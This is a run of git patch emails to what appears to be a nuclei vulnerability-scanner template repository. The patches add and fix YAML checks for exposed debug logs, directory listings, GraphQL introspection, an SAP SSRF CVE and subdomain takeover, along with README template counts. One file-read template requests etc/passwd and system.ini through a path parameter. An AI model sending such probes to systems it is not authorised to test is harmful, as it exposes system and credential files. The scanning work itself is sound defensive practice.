Fri, 4 Jun 2021 20:36:33 +0530 Subject: [PATCH 131/144] Added WordPress Mailchimp 4 Debug Log Exposure --- .../wordpress/wp-mailchimp-log-exposure.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml diff --git a/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml b/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml new file mode 100644 index 0000000000..1869a7386f --- /dev/null +++ b/vulnerabilities/wordpress/wp-mailchimp-log-exposure.yaml @@ -0,0 +1,28 @@ +id: wp-mailchimp-log-exposure + +info: + name: WordPress Mailchimp 4 Debug Log Exposure + author: aashiq + severity: medium + description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content + tags: logs,wordpress,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "WARNING: Form" + + - type: word + words: + - 'text/plain' + part: header \ No newline at end of file From edcc35d604c95f589a014fe63b55c038d8021160 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 20:46:19 +0530 Subject: [PATCH 132/144] Added Private key exposure via helper detector --- misconfiguration/private-key-exposure.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 misconfiguration/private-key-exposure.yaml diff --git a/misconfiguration/private-key-exposure.yaml b/misconfiguration/private-key-exposure.yaml new file mode 100644 index 0000000000..c478f731a0 --- /dev/null +++ b/misconfiguration/private-key-exposure.yaml @@ -0,0 +1,25 @@ +id: private-key-exposure + +info: + name: Private key exposure via helper detector + author: aashiq + severity: high + description: Searches for private key exposure by attempting to query the helper endpoint on node_modules + tags: exposure,node + +requests: + - method: GET + path: + - "{{BaseURL}}/node_modules/mqtt/test/helpers/" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Index of /node_modules/mqtt/test/helpers" + - "Parent Directory" + condition: and \ No newline at end of file From 1557b782e952f720b0c6731a339ac0977a434148 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 20:57:01 +0530 Subject: [PATCH 133/144] Added WordPress Popup Plugin listing --- .../wordpress/wp-popup-listing.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 vulnerabilities/wordpress/wp-popup-listing.yaml diff --git a/vulnerabilities/wordpress/wp-popup-listing.yaml b/vulnerabilities/wordpress/wp-popup-listing.yaml new file mode 100644 index 0000000000..e8ea453ee8 --- /dev/null +++ b/vulnerabilities/wordpress/wp-popup-listing.yaml @@ -0,0 +1,25 @@ +id: wordpress-popup-listing + +info: + name: WordPress Popup Plugin Directory Listing + author: aashiq + severity: info + description: Searches for sensitive directories present in the wordpress-popup plugin. + tags: wordpress,listing + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wordpress-popup/views/admin/" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "Index of" + - "/wp-content/plugins/wordpress-popup/views/admin" + condition: and From 9d8634be337f19d48542de8586d7a5de601182dd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Jun 2021 15:29:59 +0000 Subject: [PATCH 134/144] Auto Update README [Fri Jun 4 15:29:58 UTC 2021] :robot: --- README.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 444656f365..d8cdc59cb8 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 328 | vulnerabilities | 173 | exposed-panels | 145 | +| cves | 328 | vulnerabilities | 175 | exposed-panels | 146 | | takeovers | 67 | exposures | 105 | technologies | 98 | -| misconfiguration | 65 | workflows | 32 | miscellaneous | 22 | +| misconfiguration | 66 | workflows | 32 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | -| fuzzing | 9 | helpers | 8 | iot | 12 | +| fuzzing | 9 | helpers | 8 | iot | 13 | -**111 directories, 1201 files**. +**111 directories, 1206 files**. From 1fab4f8dbfb2dc2b5e9f3fbaac901454dcffdfdf Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 21:14:20 +0530 Subject: [PATCH 135/144] Duplicate with - wordpress-directory-listing --- .../wordpress/wp-uploads-listing.yaml | 32 ------------------- 1 file changed, 32 deletions(-) delete mode 100644 vulnerabilities/wordpress/wp-uploads-listing.yaml diff --git a/vulnerabilities/wordpress/wp-uploads-listing.yaml b/vulnerabilities/wordpress/wp-uploads-listing.yaml deleted file mode 100644 index 86af016597..0000000000 --- a/vulnerabilities/wordpress/wp-uploads-listing.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: wp-uploads-listing - -info: - name: WordPress Upload Directory Listing Enable - author: yashgoti - severity: info - tags: wordpress - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/uploads/" - - "{{BaseURL}}/wp-content/uploads/2015/" - - "{{BaseURL}}/wp-content/uploads/2016/" - - "{{BaseURL}}/wp-content/uploads/2017/" - - "{{BaseURL}}/wp-content/uploads/2018/" - - "{{BaseURL}}/wp-content/uploads/2019/" - - "{{BaseURL}}/wp-content/uploads/2020/" - - "{{BaseURL}}/wp-content/uploads/2021/" - - "{{BaseURL}}/wp-content/uploads/cfdb7_uploads/" - matchers-condition: and - matchers: - - type: word - words: - - "Directory listing for" - - "Index of /" - - "[To Parent Directory]" - - "Directory: /" - - - type: status - status: - - 200 From b6058200cf358e5be45685200ce96f0c32ef81fd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Jun 2021 15:44:45 +0000 Subject: [PATCH 136/144] Auto Update README [Fri Jun 4 15:44:45 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d8cdc59cb8..db65ef368a 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 328 | vulnerabilities | 175 | exposed-panels | 146 | +| cves | 328 | vulnerabilities | 174 | exposed-panels | 146 | | takeovers | 67 | exposures | 105 | technologies | 98 | | misconfiguration | 66 | workflows | 32 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 13 | -**111 directories, 1206 files**. +**111 directories, 1205 files**. From 1f6334671cd1bd82b246901c75ba41f4257f1733 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 21:26:59 +0530 Subject: [PATCH 137/144] escape fix --- vulnerabilities/other/interlib-fileread.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/interlib-fileread.yaml b/vulnerabilities/other/interlib-fileread.yaml index 32be6e4dbb..97641cace9 100644 --- a/vulnerabilities/other/interlib-fileread.yaml +++ b/vulnerabilities/other/interlib-fileread.yaml @@ -11,7 +11,7 @@ requests: - method: GET path: - "{{BaseURL}}/interlib/report/ShowImage?localPath=etc/passwd" - - "{{BaseURL}}/interlib/report/ShowImage?localPath=C:\Windows\system.ini" + - "{{BaseURL}}/interlib/report/ShowImage?localPath=C:\\Windows\\system.ini" matchers-condition: and matchers: From 5d63b1bb05f7dfa04e9f1b6c0bb087a42fdb96fc Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 21:33:01 +0530 Subject: [PATCH 138/144] Fixing the condition --- vulnerabilities/other/interlib-fileread.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/interlib-fileread.yaml b/vulnerabilities/other/interlib-fileread.yaml index 97641cace9..11298f21e8 100644 --- a/vulnerabilities/other/interlib-fileread.yaml +++ b/vulnerabilities/other/interlib-fileread.yaml @@ -19,8 +19,8 @@ requests: - type: regex regex: - "root:[x*]:0:0" - - "for 16-bit" - condition: and + - "for 16-bit app support" + condition: or - type: status status: From 7a2f03dcb727f912002d226ea96da21e51faa528 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Jun 2021 16:07:44 +0000 Subject: [PATCH 139/144] Auto Update README [Fri Jun 4 16:07:44 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index db65ef368a..d8cdc59cb8 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 328 | vulnerabilities | 174 | exposed-panels | 146 | +| cves | 328 | vulnerabilities | 175 | exposed-panels | 146 | | takeovers | 67 | exposures | 105 | technologies | 98 | | misconfiguration | 66 | workflows | 32 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 13 | -**111 directories, 1205 files**. +**111 directories, 1206 files**. From f5addb24c1941d7071ce902232a37da431701951 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 4 Jun 2021 23:53:21 +0530 Subject: [PATCH 140/144] misc updates --- technologies/{graphql.yaml => graphql-detect.yaml} | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) rename technologies/{graphql.yaml => graphql-detect.yaml} (96%) diff --git a/technologies/graphql.yaml b/technologies/graphql-detect.yaml similarity index 96% rename from technologies/graphql.yaml rename to technologies/graphql-detect.yaml index eafbfe26f2..1794593fe9 100644 --- a/technologies/graphql.yaml +++ b/technologies/graphql-detect.yaml @@ -1,7 +1,7 @@ -id: graphql +id: graphql-detect info: - name: GraphQL API + name: GraphQL API Detection author: NkxxkN & ELSFA7110 severity: info @@ -51,6 +51,7 @@ requests: headers: Content-Type: application/json + body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}' matchers-condition: and @@ -58,8 +59,10 @@ requests: - type: status status: - 200 + - type: regex regex: - "__schema" - "(Introspection|INTROSPECTION|introspection).*?" - ".*?operation not found.*?" + condition: or \ No newline at end of file From 11cb8b310639fedbfcb9ab83fd2745b4c4cd36e5 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 5 Jun 2021 00:00:50 +0530 Subject: [PATCH 141/144] Update CVE-2020-6308.yaml --- cves/2020/CVE-2020-6308.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml index b29b3eee67..773c79b9af 100644 --- a/cves/2020/CVE-2020-6308.yaml +++ b/cves/2020/CVE-2020-6308.yaml @@ -4,7 +4,7 @@ info: name: Unauthenticated Blind SSRF in SAP author: madrobot severity: medium - description: https://github.com/InitRoot/CVE-2020-6308-PoC + reference: https://github.com/InitRoot/CVE-2020-6308-PoC tags: cve,cve2020,sap,ssrf requests: From 83d359f6cf21e8481eef21cd1056b67f9d439540 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 5 Jun 2021 00:02:33 +0530 Subject: [PATCH 142/144] updating tags --- cves/2020/CVE-2020-6308.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-6308.yaml b/cves/2020/CVE-2020-6308.yaml index 773c79b9af..a0bb988cd8 100644 --- a/cves/2020/CVE-2020-6308.yaml +++ b/cves/2020/CVE-2020-6308.yaml @@ -5,7 +5,7 @@ info: author: madrobot severity: medium reference: https://github.com/InitRoot/CVE-2020-6308-PoC - tags: cve,cve2020,sap,ssrf + tags: cve,cve2020,sap,ssrf,oob requests: - method: POST From 8716c7c8a62c9b1bb35461816b45811dbbca7ac0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 4 Jun 2021 18:35:16 +0000 Subject: [PATCH 143/144] Auto Update README [Fri Jun 4 18:35:16 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d8cdc59cb8..5ed60f9fa1 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 328 | vulnerabilities | 175 | exposed-panels | 146 | +| cves | 329 | vulnerabilities | 175 | exposed-panels | 146 | | takeovers | 67 | exposures | 105 | technologies | 98 | | misconfiguration | 66 | workflows | 32 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 13 | -**111 directories, 1206 files**. +**111 directories, 1207 files**. From ba0d092d4d8dfae79ba02c1259027c7422cc4b3e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sat, 5 Jun 2021 09:40:37 +0530 Subject: [PATCH 144/144] Update landingi-takeover.yaml --- takeovers/landingi-takeover.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/takeovers/landingi-takeover.yaml b/takeovers/landingi-takeover.yaml index 19d8cd4a2d..37a3dcec7b 100644 --- a/takeovers/landingi-takeover.yaml +++ b/takeovers/landingi-takeover.yaml @@ -3,9 +3,9 @@ id: landingi-takeover info: name: landingi takeover detection author: pdcommunity - severity: high + severity: info tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz + reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/117 requests: - method: GET @@ -16,4 +16,5 @@ requests: - type: word words: - It looks like you're lost - - The page you are looking for is not found \ No newline at end of file + - The page you are looking for is not found + condition: and \ No newline at end of file